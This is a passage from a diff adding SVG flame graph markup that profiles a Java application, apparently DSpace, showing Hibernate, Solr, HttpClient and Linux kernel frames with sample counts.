+<title>org/apache/http/protocol/RequestContent:::process (1 samples, 0.08%)</title><rect x="802.3" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="805.29" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::sendRequestEntity (1 samples, 0.08%)</title><rect x="1159.1" y="373" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1162.10" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (1 samples, 0.08%)</title><rect x="1147.9" y="485" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1150.86" y="495.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="817.3" y="133" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="820.27" y="143.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%)</title><rect x="777.9" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.94" y="415.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (12 samples, 0.95%)</title><rect x="1178.8" y="629" width="11.2" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="1181.76" y="639.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::resolve (1 samples, 0.08%)</title><rect x="317.2" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="320.17" y="431.5" ></text>
+</g>
+<g >
+<title>__entry_text_start (1 samples, 0.08%)</title><rect x="83.0" y="853" width="1.0" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="86.05" y="863.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::loadCollection (1 samples, 0.08%)</title><rect x="777.0" y="293" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="303.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::initializeEntitiesAndCollections (1 samples, 0.08%)</title><rect x="784.5" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="787.49" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.24%)</title><rect x="1176.0" y="789" width="2.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1178.95" y="799.5" ></text>
+</g>
+<g >
+<title>intel_tfa_pmu_enable_all (4 samples, 0.32%)</title><rect x="10.0" y="645" width="3.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="13.00" y="655.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (3 samples, 0.24%)</title><rect x="921.2" y="373" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="924.22" y="383.5" ></text>
+</g>
+<g >
+<title>java/util/LinkedList:::addAll (1 samples, 0.08%)</title><rect x="782.6" y="469" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="785.62" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/AbstractUpdateRequest:::process (16 samples, 1.27%)</title><rect x="804.2" y="501" width="14.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="807.16" y="511.5" ></text>
+</g>
+<g >
+<title>java/util/LinkedList:::addAll (1 samples, 0.08%)</title><rect x="779.8" y="469" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="782.81" y="479.5" ></text>
+</g>
+<g >
+<title>__tcp_push_pending_frames (26 samples, 2.06%)</title><rect x="88.7" y="709" width="24.3" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="91.67" y="719.5" >_..</text>
+</g>
+<g >
+<title>exit_to_usermode_loop (1 samples, 0.08%)</title><rect x="518.5" y="373" width="1.0" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="521.52" y="383.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group_$$_jvst437_1e:::getHibernateLazyInitializer (2 samples, 0.16%)</title><rect x="910.9" y="389" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="913.92" y="399.5" ></text>
+</g>
+<g >
+<title>JVM_IHashCode (1 samples, 0.08%)</title><rect x="1143.2" y="389" width="0.9" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="1146.17" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp2/DelegatingPreparedStatement:::executeQuery (3 samples, 0.24%)</title><rect x="767.6" y="437" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="770.63" y="447.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (2 samples, 0.16%)</title><rect x="1161.0" y="421" width="1.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1163.97" y="431.5" ></text>
+</g>
+<g >
+<title>visit_groups_merge (1 samples, 0.08%)</title><rect x="64.3" y="597" width="1.0" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="67.32" y="607.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getDelegate (6 samples, 0.48%)</title><rect x="804.2" y="453" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="807.16" y="463.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::intern (1 samples, 0.08%)</title><rect x="1006.4" y="405" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1009.44" y="415.5" ></text>
+</g>
+<g >
+<title>default_wake_function (1 samples, 0.08%)</title><rect x="98.0" y="213" width="1.0" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="101.03" y="223.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/StatefulPersistenceContext:::proxyFor (1 samples, 0.08%)</title><rect x="770.4" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="773.44" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/StatefulPersistenceContext:::getCollectionEntry (2 samples, 0.16%)</title><rect x="618.7" y="421" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="621.73" y="431.5" ></text>
+</g>
+<g >
+<title>activate_task (1 samples, 0.08%)</title><rect x="98.0" y="165" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="101.03" y="175.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp2/DelegatingPreparedStatement:::executeQuery (1 samples, 0.08%)</title><rect x="313.4" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="316.43" y="447.5" ></text>
+</g>
+<g >
+<title>security_socket_sendmsg (1 samples, 0.08%)</title><rect x="114.0" y="773" width="0.9" height="15.0" fill="rgb(240,109,109)" rx="2" ry="2" />
+<text  x="116.95" y="783.5" ></text>
+</g>
+<g >
+<title>Interpreter (1,118 samples, 88.73%)</title><rect x="118.6" y="565" width="1047.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="121.63" y="575.5" >Interpreter</text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.08%)</title><rect x="384.6" y="421" width="0.9" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="387.60" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (2 samples, 0.16%)</title><rect x="750.8" y="437" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="753.78" y="447.5" ></text>
+</g>
+<g >
+<title>itable stub (16 samples, 1.27%)</title><rect x="1041.1" y="405" width="15.0" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1044.10" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::loadByUniqueKey (1 samples, 0.08%)</title><rect x="781.7" y="373" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="784.68" y="383.5" ></text>
+</g>
+<g >
+<title>schedule (4 samples, 0.32%)</title><rect x="10.0" y="741" width="3.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="13.00" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp2/DelegatingPreparedStatement:::executeQuery (1 samples, 0.08%)</title><rect x="758.3" y="341" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/TwoPhaseLoad:::doInitializeEntity (1 samples, 0.08%)</title><rect x="779.8" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="782.81" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (2 samples, 0.16%)</title><rect x="295.6" y="405" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="298.63" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/authorize/dao/impl/ResourcePolicyDAOImpl:::findByDSoAndAction (152 samples, 12.06%)</title><rect x="870.7" y="501" width="142.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="873.65" y="511.5" >org/dspace/authori..</text>
+</g>
+<g >
+<title>java/io/ByteArrayInputStream:::read (1 samples, 0.08%)</title><rect x="815.4" y="277" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="818.40" y="287.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (24 samples, 1.90%)</title><rect x="60.6" y="853" width="22.4" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="63.57" y="863.5" >e..</text>
+</g>
+<g >
+<title>__x64_sys_sendto (33 samples, 2.62%)</title><rect x="84.0" y="821" width="30.9" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="86.98" y="831.5" >__..</text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (16 samples, 1.27%)</title><rect x="65.3" y="581" width="14.9" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="68.25" y="591.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CascadingAction$4:::cascade (1 samples, 0.08%)</title><rect x="756.4" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="759.40" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration:::getProperty (2 samples, 0.16%)</title><rect x="1136.6" y="405" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1139.62" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1,118 samples, 88.73%)</title><rect x="118.6" y="645" width="1047.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="121.63" y="655.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>java/lang/Throwable:::fillInStackTrace (1 samples, 0.08%)</title><rect x="1161.9" y="245" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1164.90" y="255.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (12 samples, 0.95%)</title><rect x="792.9" y="485" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="495.5" ></text>
+</g>
+<g >
+<title>java/util/HashSet:::add (1 samples, 0.08%)</title><rect x="1138.5" y="405" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1141.49" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isEntityType (1 samples, 0.08%)</title><rect x="232.9" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="235.89" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration$1:::entrySet (1 samples, 0.08%)</title><rect x="1140.4" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1143.37" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/collection/AbstractCollectionPersister:::getElementType (2 samples, 0.16%)</title><rect x="660.9" y="437" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="663.87" y="447.5" ></text>
+</g>
+<g >
+<title>tcp_sendmsg_locked (30 samples, 2.38%)</title><rect x="85.9" y="741" width="28.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="88.86" y="751.5" >t..</text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/Header:::addField (1 samples, 0.08%)</title><rect x="786.4" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="789.37" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/tree/DefaultExpressionEngine:::processSubNodes (1 samples, 0.08%)</title><rect x="840.7" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="843.68" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::initializeEntitiesAndCollections (1 samples, 0.08%)</title><rect x="777.0" y="261" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="271.5" ></text>
+</g>
+<g >
+<title>jint_disjoint_arraycopy (1 samples, 0.08%)</title><rect x="802.3" y="325" width="0.9" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="805.29" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/http/message/BasicLineParser:::parseStatusLine (1 samples, 0.08%)</title><rect x="1158.2" y="293" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1161.16" y="303.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.08%)</title><rect x="761.1" y="325" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="764.08" y="335.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group_$$_jvst437_1e:::getHibernateLazyInitializer (5 samples, 0.40%)</title><rect x="512.0" y="405" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="514.97" y="415.5" ></text>
+</g>
+<g >
+<title>sun/reflect/DelegatingMethodAccessorImpl:::invoke (1,118 samples, 88.73%)</title><rect x="118.6" y="725" width="1047.1" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="121.63" y="735.5" >sun/reflect/DelegatingMethodAccessorImpl:::invoke</text>
+</g>
+<g >
+<title>__softirqentry_text_start (1 samples, 0.08%)</title><rect x="80.2" y="597" width="1.0" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="83.24" y="607.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.08%)</title><rect x="294.7" y="357" width="0.9" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="297.70" y="367.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="817.3" y="293" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="820.27" y="303.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (36 samples, 2.86%)</title><rect x="1101.0" y="437" width="33.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1104.03" y="447.5" >or..</text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%)</title><rect x="761.1" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="764.08" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/bitstore/BitstreamStorageServiceImpl:::retrieve (4 samples, 0.32%)</title><rect x="789.2" y="437" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="792.17" y="447.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (3 samples, 0.24%)</title><rect x="90.5" y="597" width="2.8" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="93.54" y="607.5" ></text>
+</g>
+<g >
+<title>Java_java_lang_Throwable_fillInStackTrace (1 samples, 0.08%)</title><rect x="1161.9" y="229" width="0.9" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1164.90" y="239.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1161.9" y="309" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1164.90" y="319.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.08%)</title><rect x="784.5" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="787.49" y="463.5" ></text>
+</g>
+<g >
+<title>sk_wait_data (21 samples, 1.67%)</title><rect x="62.4" y="741" width="19.7" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="65.44" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration:::getProperty (24 samples, 1.90%)</title><rect x="820.1" y="501" width="22.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="823.08" y="511.5" >o..</text>
+</g>
+<g >
+<title>Interpreter (1,118 samples, 88.73%)</title><rect x="118.6" y="597" width="1047.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="121.63" y="607.5" >Interpreter</text>
+</g>
+<g >
+<title>perf_pmu_nop_int (1 samples, 0.08%)</title><rect x="114.9" y="677" width="0.9" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="117.89" y="687.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultUserTokenHandler:::getUserToken (1 samples, 0.08%)</title><rect x="816.3" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="819.33" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/utils/URLEncodedUtils:::urlDecode (1 samples, 0.08%)</title><rect x="814.5" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="817.46" y="415.5" ></text>
+</g>
+<g >
+<title>Java_java_lang_Throwable_fillInStackTrace (1 samples, 0.08%)</title><rect x="1150.7" y="229" width="0.9" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1153.67" y="239.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/DefaultEntityAliases:::&lt;init&gt; (2 samples, 0.16%)</title><rect x="1005.5" y="437" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1008.51" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/spring/SpringServiceManager:::getServicesByType (4 samples, 0.32%)</title><rect x="1134.7" y="501" width="3.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1137.75" y="511.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item_$$_jvst437_4:::getHandle (4 samples, 0.32%)</title><rect x="758.3" y="533" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushCollections (1 samples, 0.08%)</title><rect x="671.2" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="674.17" y="479.5" ></text>
+</g>
+<g >
+<title>flexible_sched_in (1 samples, 0.08%)</title><rect x="114.9" y="693" width="0.9" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="117.89" y="703.5" ></text>
+</g>
+<g >
+<title>perf_pmu_enable.part.0 (4 samples, 0.32%)</title><rect x="10.0" y="677" width="3.7" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="13.00" y="687.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (31 samples, 2.46%)</title><rect x="195.4" y="405" width="29.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="198.43" y="415.5" >or..</text>
+</g>
+<g >
+<title>org/dspace/discovery/configuration/DiscoverySearchFilter:::getFilterType (2 samples, 0.16%)</title><rect x="1162.8" y="533" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1165.84" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/jdbc/internal/ResultSetReturnImpl:::extract (1 samples, 0.08%)</title><rect x="758.3" y="357" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="367.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (5 samples, 0.40%)</title><rect x="832.3" y="405" width="4.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="835.25" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/AbstractMultipartForm:::doWriteTo (10 samples, 0.79%)</title><rect x="792.9" y="325" width="9.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="335.5" ></text>
+</g>
+<g >
+<title>x86_pmu_enable (48 samples, 3.81%)</title><rect x="14.7" y="661" width="44.9" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="17.68" y="671.5" >x86_..</text>
+</g>
+<g >
+<title>pick_next_task_fair (1 samples, 0.08%)</title><rect x="115.8" y="773" width="1.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="118.83" y="783.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushCollections (5 samples, 0.40%)</title><rect x="1015.8" y="437" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1018.81" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultLoadEventListener:::load (3 samples, 0.24%)</title><rect x="758.3" y="453" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="463.5" ></text>
+</g>
+<g >
+<title>__pthread_mutex_lock (1 samples, 0.08%)</title><rect x="800.4" y="261" width="0.9" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="803.41" y="271.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.08%)</title><rect x="785.4" y="469" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.43" y="479.5" ></text>
+</g>
+<g >
+<title>perf_pmu_enable.part.0 (16 samples, 1.27%)</title><rect x="65.3" y="629" width="14.9" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="68.25" y="639.5" ></text>
+</g>
+<g >
+<title>java/io/SequenceInputStream:::read (1 samples, 0.08%)</title><rect x="797.6" y="277" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="800.60" y="287.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (4 samples, 0.32%)</title><rect x="1097.3" y="437" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1100.29" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="969.0" y="341" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="971.98" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::getPersistenceContext (1 samples, 0.08%)</title><rect x="646.8" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="649.83" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/criteria/CriteriaLoader:::&lt;init&gt; (8 samples, 0.63%)</title><rect x="1005.5" y="469" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1008.51" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (1 samples, 0.08%)</title><rect x="516.7" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="519.65" y="415.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::&lt;init&gt; (1 samples, 0.08%)</title><rect x="790.1" y="261" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="793.11" y="271.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/AbstractMultipartForm:::encode (3 samples, 0.24%)</title><rect x="794.8" y="293" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="797.79" y="303.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CascadingAction:::requiresNoCascadeChecking (1 samples, 0.08%)</title><rect x="1132.9" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1135.87" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection$1:::doWork (1 samples, 0.08%)</title><rect x="761.1" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="764.08" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractMessageParser:::parse (1 samples, 0.08%)</title><rect x="1158.2" y="341" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1161.16" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestHeader (1 samples, 0.08%)</title><rect x="1160.0" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1163.03" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractType:::isCollectionType (1 samples, 0.08%)</title><rect x="545.7" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="548.68" y="447.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.08%)</title><rect x="990.5" y="341" width="1.0" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="993.52" y="351.5" ></text>
+</g>
+<g >
+<title>itable stub (2 samples, 0.16%)</title><rect x="1058.9" y="389" width="1.9" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1061.89" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (3 samples, 0.24%)</title><rect x="1158.2" y="437" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1161.16" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::request (8 samples, 0.63%)</title><rect x="1155.3" y="501" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1158.35" y="511.5" ></text>
+</g>
+<g >
+<title>schedule (2 samples, 0.16%)</title><rect x="114.9" y="805" width="1.9" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="117.89" y="815.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.08%)</title><rect x="777.0" y="309" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="319.5" ></text>
+</g>
+<g >
+<title>flexible_sched_in (1 samples, 0.08%)</title><rect x="13.7" y="629" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="16.75" y="639.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="797.6" y="69" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="800.60" y="79.5" ></text>
+</g>
+<g >
+<title>register_finalizer Runtime1 stub (1 samples, 0.08%)</title><rect x="752.7" y="437" width="0.9" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="755.65" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObjectServiceImpl:::getMetadataFirstValue (1 samples, 0.08%)</title><rect x="778.9" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="781.87" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/jdbc/internal/JdbcCoordinatorImpl:::release (1 samples, 0.08%)</title><rect x="781.7" y="325" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="784.68" y="335.5" ></text>
+</g>
+<g >
